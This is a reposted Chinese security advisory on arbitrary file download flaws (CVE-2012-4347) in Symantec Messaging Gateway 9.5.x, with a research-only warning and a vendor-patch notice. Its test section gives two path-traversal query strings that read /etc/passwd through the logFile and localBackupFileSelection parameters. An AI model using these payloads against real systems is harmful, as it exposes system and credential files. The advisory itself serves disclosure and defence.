Symantec Messaging Gateway任意文件下载漏洞

发布日期:2012-12-01
更新日期:2012-12-06

受影响系统:
Symantec Messaging Gateway 9.5.1
Symantec Messaging Gateway 9.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56789
CVE(CAN) ID: CVE-2012-4347

Symantec Messaging Gateway是赛门铁克的电子邮件病毒保护软件。

Symantec Messaging Gateway 9.5.x存在多个任意文件下载漏洞,攻击者可利用这些漏洞在Web服务器上下载任意文件。

<*来源:Ben Williams
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

?type=logs&amp;amp;logFile=../../../etc/passwd&amp;amp;logType=1&amp;amp;browserType=1

?no-cache=false&amp;amp;displayTab=restore&amp;amp;restoreSource=APPLIANCE&amp;amp;localBackupFileSelection=../../etc/passwd

建议:
--------------------------------------------------------------------------------
厂商补丁:

Symantec
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wyddxp.html